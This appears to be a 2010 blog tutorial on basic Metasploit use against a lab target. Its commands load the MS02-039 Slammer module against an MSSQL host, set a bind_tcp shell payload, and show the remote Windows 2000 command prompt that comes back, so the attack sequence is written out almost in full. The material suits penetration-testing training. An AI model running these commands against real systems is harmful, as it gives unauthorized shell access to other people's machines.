Monday, September 13, 2010

Tutorial: Metasploit Basics 1

Exploiting Vulnerable Server (MS02-039)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.101/24 (DEN-WEB1)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Search for mssql pattern & use the correct exploit module (ms03-039)

msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...

msf > info windows/mssql/ms02_039_slammer

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show payloads

msf exploit(ms02_039_slammer) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms02_039_slammer) > show options

msf exploit(ms02_039_slammer) > set RHOST 131.107.1.101
msf exploit(ms02_039_slammer) > set LHOST 131.107.1.252
msf exploit(ms02_039_slammer) > set LPORT 5555
msf exploit(ms02_039_slammer) > exploit

sniff...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
Posted by at

1 comment:

  1. Saad AmirDecember 27, 2011 at 7:25 AM

    Your information for the student has been very help to creating the new software.That things has been very impress to see with the student.
    Thanks...
    regards, saad from
    Education

    ReplyDelete

Subscribe to: Post Comments (Atom)